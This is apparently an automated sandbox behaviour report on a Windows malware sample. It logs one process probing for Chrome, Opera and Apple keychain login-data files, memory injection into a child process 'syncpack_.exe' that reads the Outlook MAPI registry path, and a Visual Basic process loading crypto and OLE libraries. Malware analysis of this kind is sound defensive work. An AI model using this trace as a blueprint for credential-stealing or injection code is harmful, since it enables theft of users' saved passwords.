File Get Info filename = C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\CertificateTransparency\Login Data, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Crashpad\Web Data, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Crashpad\Login Data, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Default\Web Data, type = file_attributes True 1
Fn
File Get Info type = size, size_out = 0 True 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Default\Login Data, type = file_attributes True 1
Fn
File Get Info type = size, size_out = 0 True 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\EVWhitelist\Web Data, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\EVWhitelist\Login Data, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\FileTypePolicies\Web Data, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\FileTypePolicies\Login Data, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\OriginTrials\Web Data, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\OriginTrials\Login Data, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\PepperFlash\Web Data, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\PepperFlash\Login Data, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\pnacl\Web Data, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\pnacl\Login Data, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Web Data, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Login Data, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\SwReporter\Web Data, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\SwReporter\Login Data, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\WidevineCdm\Web Data, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\WidevineCdm\Login Data, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\AppData\Roaming\Apple Computer\Preferences\keychain.plist, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\AppData\Roaming\Opera\Opera\wand.dat, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\AppData\Roaming\Opera\Opera7\profile\wand.dat, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\AppData\Roaming\Opera Software\Opera Stable\Login Data, type = file_attributes False 1
Fn
File Write size = 3 True 1
Fn
Data
File Write size = 1 True 1
Fn
Data
File Write size = 11 True 1
Fn
Data
File Write size = 1 True 1
Fn
Data
File Write size = 9 True 1
Fn
Data
File Write size = 1 True 1
Fn
Data
File Write size = 8 True 1
Fn
Data
File Write size = 1 True 1
Fn
Data
File Write size = 17 True 1
Fn
Data
File Write size = 1 True 1
Fn
Data
File Write size = 15 True 1
Fn
Data
File Write size = 1 True 1
Fn
Data
File Write size = 14 True 1
Fn
Data
File Write size = 1 True 1
Fn
Data
File Write size = 12 True 1
Fn
Data
File Write size = 1 True 1
Fn
Data
File Write size = 13 True 1
Fn
Data
File Write size = 2 True 1
Fn
Data
Process #12: syncpack_.exe
46 0
»
Information Value
ID #12
File Name c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack_.exe
Command Line "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack_.exe" "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D3.tmp"
Initial Working Directory C:\Users\kFT6uTQW\Desktop\
Monitor Start Time: 00:03:23, Reason: Child Process
Unmonitor End Time: 00:05:08, Reason: Terminated by Timeout
Monitor Duration 00:01:45
OS Process Information
»
Information Value
PID 0x834
Parent PID 0xb70 (c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe)
Is Created or Modified Executable True
Integrity Level Medium
Username XABNCPUWKW\kFT6uTQW
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 8A8
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000030000 0x00030000 0x00033fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000040000 0x00040000 0x00040fff Pagefile Backed Memory Readable True False False -
private_0x0000000000050000 0x00050000 0x00050fff Private Memory Readable, Writable True False False -
private_0x00000000000b0000 0x000b0000 0x0012ffff Private Memory Readable, Writable True False False -
locale.nls 0x00130000 0x00196fff Memory Mapped File Readable False False False -
private_0x00000000001c0000 0x001c0000 0x002bffff Private Memory Readable, Writable True False False -
private_0x00000000002c0000 0x002c0000 0x003bffff Private Memory Readable, Writable True False False -
private_0x00000000003c0000 0x003c0000 0x003cffff Private Memory Readable, Writable True False False -
pagefile_0x00000000003d0000 0x003d0000 0x00557fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000560000 0x00560000 0x006e0fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000006f0000 0x006f0000 0x01aeffff Pagefile Backed Memory Readable True False False -
kernel32.dll 0x777e0000 0x778fefff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x77900000 0x779f9fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77a00000 0x77ba8fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fffa000 0x7fffa000 0x7fffafff Private Memory Readable, Writable True False False -
syncpack_.exe 0xffab0000 0xffac5fff Memory Mapped File Readable, Writable, Executable True True False
private_0x0000000140000000 0x140000000 0x14001efff Private Memory Readable, Writable, Executable True False False -
kernelbase.dll 0x7fefda00000 0x7fefda6afff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x7fefdd20000 0x7fefdd86fff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x7fefde80000 0x7fefdf1efff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x7fefdf20000 0x7fefdf90fff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x7fefe040000 0x7fefe242fff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x7fefe4b0000 0x7fefe58afff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x7fefe9c0000 0x7feff747fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x7feff750000 0x7feff76efff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x7feff770000 0x7feff838fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x7feffa40000 0x7feffb6cfff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x7feffb70000 0x7feffc78fff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x7feffcd0000 0x7feffcfdfff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x7feffd00000 0x7feffd0dfff Memory Mapped File Readable, Writable, Executable False False False -
apisetschema.dll 0x7feffd20000 0x7feffd20fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000007fffffb0000 0x7fffffb0000 0x7fffffd2fff Pagefile Backed Memory Readable True False False -
private_0x000007fffffd8000 0x7fffffd8000 0x7fffffd8fff Private Memory Readable, Writable True False False -
private_0x000007fffffde000 0x7fffffde000 0x7fffffdffff Private Memory Readable, Writable True False False -
Injection Information
»
Injection Type Source Process Source Os Thread ID Information Success Count Logfile
Modify Memory #6: c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe 0x86c address = 0x140000000, size = 126976 True 1
Fn
Data
Modify Memory #6: c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe 0x86c address = 0x7fffffd8010, size = 8 True 1
Fn
Data
Modify Control Flow #6: c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe 0x86c os_tid = 0x8a8, address = 0x0 True 1
Fn
Threads
Thread 0x8a8
46 0
»
Category Operation Information Success Count Logfile
System Get Time type = System Time, time = 2018-06-25 14:54:25 (UTC) True 1
Fn
Module Get Handle module_name = c:\windows\system32\kernel32.dll, base_address = 0x777e0000 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = FlsAlloc, address_out = 0x777f7190 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = FlsFree, address_out = 0x777f15b0 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = FlsGetValue, address_out = 0x77803520 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = FlsSetValue, address_out = 0x777fbd90 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = InitializeCriticalSectionEx, address_out = 0x777f79b0 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = CreateEventExW, address_out = 0x7782c590 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = CreateSemaphoreExW, address_out = 0x7782c4c0 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = SetThreadStackGuarantee, address_out = 0x777e8050 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = CreateThreadpoolTimer, address_out = 0x777e8820 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = SetThreadpoolTimer, address_out = 0x77a1b2f0 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = WaitForThreadpoolTimerCallbacks, address_out = 0x77a0d8c0 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = CloseThreadpoolTimer, address_out = 0x77a0d620 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = CreateThreadpoolWait, address_out = 0x7782ba80 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = SetThreadpoolWait, address_out = 0x77a1e170 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = CloseThreadpoolWait, address_out = 0x77a0c540 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = FlushProcessWriteBuffers, address_out = 0x77a51f80 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = FreeLibraryWhenCallbackReturns, address_out = 0x77acec60 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = GetCurrentProcessorNumber, address_out = 0x77a50040 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = GetLogicalProcessorInformation, address_out = 0x7782b820 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = CreateSymbolicLinkW, address_out = 0x77855ad0 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = SetDefaultDllDirectories, address_out = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = EnumSystemLocalesEx, address_out = 0x7782c3d0 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = CompareStringEx, address_out = 0x7782b980 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = GetDateFormatEx, address_out = 0x77870920 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = GetLocaleInfoEx, address_out = 0x777e3c10 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = GetTimeFormatEx, address_out = 0x7786d4e0 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = GetUserDefaultLocaleName, address_out = 0x7782b790 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = IsValidLocaleName, address_out = 0x7782b770 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = LCMapStringEx, address_out = 0x7782b710 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = GetCurrentPackageId, address_out = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = GetTickCount64, address_out = 0x777e9450 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = GetFileInformationByHandleExW, address_out = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = SetFileInformationByHandleW, address_out = 0x0 False 1
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Open filename = STD_ERROR_HANDLE True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Module Get Filename process_name = c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack_.exe, file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack_.exe, size = 260 True 1
Fn
Module Load module_name = advapi32.dll, base_address = 0x7fefe4b0000 True 1
Fn
Module Load module_name = ole32.dll, base_address = 0x7fefe040000 True 1
Fn
Registry Create Key reg_name = HKEY_LOCAL_MACHINE\Software\Clients\Mail\Microsoft Outlook True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Clients\Mail\Microsoft Outlook, value_name = DLLPathEx, data = 67 True 1
Fn
Module Load module_name = C:\PROGRA~2\MICROS~1\Office12\OLMAPI32.DLL, base_address = 0x0 False 1
Fn
Module Get Handle module_name = mscoree.dll False 1
Fn
Process #13: surtq5qk9h.exe
2275 0
»
Information Value
ID #13
File Name c:\programdata\surtq5qk9h.exe
Command Line "C:\ProgramData\suRtQ5QK9h.exe"
Initial Working Directory C:\Users\kFT6uTQW\Desktop\
Monitor Start Time: 00:03:32, Reason: Child Process
Unmonitor End Time: 00:05:08, Reason: Terminated by Timeout
Monitor Duration 00:01:36
OS Process Information
»
Information Value
PID 0x7b4
Parent PID 0xb70 (c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username XABNCPUWKW\kFT6uTQW
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 588
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000000050000 0x00050000 0x0008ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000090000 0x00090000 0x00093fff Pagefile Backed Memory Readable True False False -
locale.nls 0x000a0000 0x00106fff Memory Mapped File Readable False False False -
private_0x0000000000110000 0x00110000 0x0013ffff Private Memory Readable, Writable True False False -
private_0x0000000000110000 0x00110000 0x0011ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000120000 0x00120000 0x00126fff Pagefile Backed Memory Readable True False False -
private_0x0000000000130000 0x00130000 0x0013ffff Private Memory Readable, Writable True False False -
rsaenh.dll 0x00140000 0x0017bfff Memory Mapped File Readable False False False -
~df91d880e8a18f5eb9.tmp 0x00140000 0x001bffff Memory Mapped File Readable, Writable True True False
pagefile_0x00000000001c0000 0x001c0000 0x001c1fff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000001d0000 0x001d0000 0x001dffff Private Memory Readable, Writable True False False -
private_0x00000000001e0000 0x001e0000 0x0025ffff Private Memory Readable, Writable True False False -
private_0x0000000000260000 0x00260000 0x0026ffff Private Memory Readable, Writable True False False -
private_0x0000000000270000 0x00270000 0x00271fff Private Memory Readable, Writable True False False -
private_0x0000000000290000 0x00290000 0x0030ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000310000 0x00310000 0x003eefff Pagefile Backed Memory Readable True False False -
surtq5qk9h.exe 0x00400000 0x00451fff Memory Mapped File Readable, Writable, Executable True False False -
private_0x0000000000460000 0x00460000 0x0cabffff Private Memory Readable, Writable True False False -
pagefile_0x000000000cac0000 0x0cac0000 0x0cc47fff Pagefile Backed Memory Readable True False False -
private_0x000000000ccb0000 0x0ccb0000 0x0cdaffff Private Memory Readable, Writable True False False -
pagefile_0x000000000cdb0000 0x0cdb0000 0x0cf30fff Pagefile Backed Memory Readable True False False -
pagefile_0x000000000cf40000 0x0cf40000 0x0e33ffff Pagefile Backed Memory Readable True False False -
private_0x000000000e340000 0x0e340000 0x0e73ffff Private Memory Readable, Writable True False False -
sortdefault.nls 0x0e740000 0x0ea0efff Memory Mapped File Readable False False False -
private_0x000000000ea10000 0x0ea10000 0x0ebcffff Private Memory Readable, Writable True False False -
private_0x000000000ea10000 0x0ea10000 0x0eb7ffff Private Memory Readable, Writable True False False -
private_0x000000000ea10000 0x0ea10000 0x0eb2ffff Private Memory Readable, Writable True False False -
private_0x000000000eb40000 0x0eb40000 0x0eb7ffff Private Memory Readable, Writable True False False -
private_0x000000000eb90000 0x0eb90000 0x0ebcffff Private Memory Readable, Writable True False False -
private_0x000000000ebd0000 0x0ebd0000 0x0ed3ffff Private Memory Readable, Writable True False False -
private_0x000000000ebd0000 0x0ebd0000 0x0eccffff Private Memory Readable, Writable True False False -
private_0x000000000ed30000 0x0ed30000 0x0ed3ffff Private Memory Readable, Writable True False False -
pagefile_0x000000000ed40000 0x0ed40000 0x0f13ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x000000000f140000 0x0f140000 0x0f532fff Pagefile Backed Memory Readable True False False -
staticcache.dat 0x0f540000 0x0fe6ffff Memory Mapped File Readable False False False -
private_0x000000000fe70000 0x0fe70000 0x1006ffff Private Memory Readable, Writable True False False -
asycfilt.dll 0x6fcd0000 0x6fce3fff Memory Mapped File Readable, Writable, Executable False False False -
rsaenh.dll 0x703e0000 0x7041afff Memory Mapped File Readable, Writable, Executable False False False -
msvbvm60.dll 0x72940000 0x72a92fff Memory Mapped File Readable, Writable, Executable True False False -
cryptsp.dll 0x74310000 0x74325fff Memory Mapped File Readable, Writable, Executable False False False -
dwmapi.dll 0x74ec0000 0x74ed2fff Memory Mapped File Readable, Writable, Executable False False False -
uxtheme.dll 0x74ee0000 0x74f5ffff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x74f70000 0x74f77fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74f80000 0x74fdbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x74fe0000 0x7501efff Memory Mapped File Readable, Writable, Executable False False False -
sxs.dll 0x752d0000 0x7532efff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75730000 0x7573bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75740000 0x7579ffff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x757d0000 0x7586cfff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x759e0000 0x759f8fff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x75a00000 0x75a8efff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x75a90000 0x75aeffff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x75be0000 0x75d3bfff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75d40000 0x75dcffff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75dd0000 0x75e7bfff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75e80000 0x75ec5fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75fb0000 0x760bffff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x76380000 0x76389fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x770d0000 0x771bffff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x771c0000 0x772bffff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x77670000 0x7773bfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77740000 0x777dffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00000000777e0000 0x777e0000 0x778fefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000077900000 0x77900000 0x779f9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x77a00000 0x77ba8fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77be0000 0x77d5ffff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Created Files
»
Filename File Size Hash Values YARA Match Actions
c:\users\kft6utqw\appdata\local\temp\~df91d880e8a18f5eb9.tmp 16.00 KB MD5: ce338fe6899778aacfc28414f2d9498b
SHA1: 897256b6709e1a4da9daba92b6bde39ccfccd8c1
SHA256: 4fe7b59af6de3b665b67788cc2f99892ab827efae3a467342b3bb4e3bc8e5bfe
False
Threads
Thread 0x588
2085 0
»
Category Operation Information Success Count Logfile
System Get Info type = Operating System True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75fb0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsTNT, address_out = 0x0 False 1
Fn
Environment Get Environment String - True 1
Fn
Data
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Get Info filename = STD_INPUT_HANDLE, type = file_type False 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Get Info filename = STD_OUTPUT_HANDLE, type = file_type False 1
Fn
File Open filename = STD_ERROR_HANDLE True 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
Module Get Filename process_name = c:\programdata\surtq5qk9h.exe, file_name_orig = C:\ProgramData\suRtQ5QK9h.exe, size = 260 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75fb0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessorFeaturePresent, address_out = 0x75fc5235 True 1
Fn
Mutex Create - True 1
Fn
Module Get Handle module_name = c:\programdata\surtq5qk9h.exe, base_address = 0x400000 True 1
Fn
Module Get Filename process_name = c:\programdata\surtq5qk9h.exe, file_name_orig = C:\Windows\system32\MSVBVM60.DLL, size = 260 True 1
Fn
System Get Info type = Operating System True 1
Fn
Module Get Filename process_name = c:\programdata\surtq5qk9h.exe, file_name_orig = C:\Windows\system32\MSVBVM60.DLL, size = 260 True 1
Fn
Module Get Filename module_name = c:\programdata\surtq5qk9h.exe, process_name = c:\programdata\surtq5qk9h.exe, file_name_orig = C:\ProgramData\suRtQ5QK9h.exe, size = 260 True 1
Fn
Module Get Filename process_name = c:\programdata\surtq5qk9h.exe, file_name_orig = C:\Windows\system32\MSVBVM60.DLL, size = 260 True 1
Fn
System Get Info type = Operating System True 1
Fn
Module Load module_name = OLEAUT32.DLL, base_address = 0x75a00000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = OleLoadPictureEx, address_out = 0x75a670a1 True 1
Fn
System Get Info type = Hardware Information True 1
Fn
System Get Info type = Operating System True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\oleaut32.dll, base_address = 0x75a00000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = DispCallFunc, address_out = 0x75a13dcf True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = LoadTypeLibEx, address_out = 0x75a107b7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = UnRegisterTypeLib, address_out = 0x75a31ca9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = CreateTypeLib2, address_out = 0x75a18e70 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarDateFromUdate, address_out = 0x75a17684 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarUdateFromDate, address_out = 0x75a1cc98 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = GetAltMonthNames, address_out = 0x75a4903a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarNumFromParseNum, address_out = 0x75a16231 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarParseNumFromStr, address_out = 0x75a15fea True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecFromR4, address_out = 0x75a23f94 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecFromR8, address_out = 0x75a24e9e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecFromDate, address_out = 0x75a4db72 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecFromI4, address_out = 0x75a32a8c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecFromCy, address_out = 0x75a4d737 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarR4FromDec, address_out = 0x75a4e015 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = GetRecordInfoFromTypeInfo, address_out = 0x75a4cc3d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = GetRecordInfoFromGuids, address_out = 0x75a4d1c4 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArrayGetRecordInfo, address_out = 0x75a4d48c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArraySetRecordInfo, address_out = 0x75a4d4c6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArrayGetIID, address_out = 0x75a4d509 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArraySetIID, address_out = 0x75a1e7bb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArrayCopyData, address_out = 0x75a1e496 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArrayAllocDescriptorEx, address_out = 0x75a1ddf1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArrayCreateEx, address_out = 0x75a4d53f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarFormat, address_out = 0x75a52055 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarFormatDateTime, address_out = 0x75a520ea True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarFormatNumber, address_out = 0x75a52151 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarFormatPercent, address_out = 0x75a521f5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarFormatCurrency, address_out = 0x75a52288 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarWeekdayName, address_out = 0x75a52335 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarMonthName, address_out = 0x75a523d5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarAdd, address_out = 0x75a25934 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarAnd, address_out = 0x75a25a98 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarCat, address_out = 0x75a259b4 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarDiv, address_out = 0x75a7e405 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarEqv, address_out = 0x75a7ef07 True 1
Fn
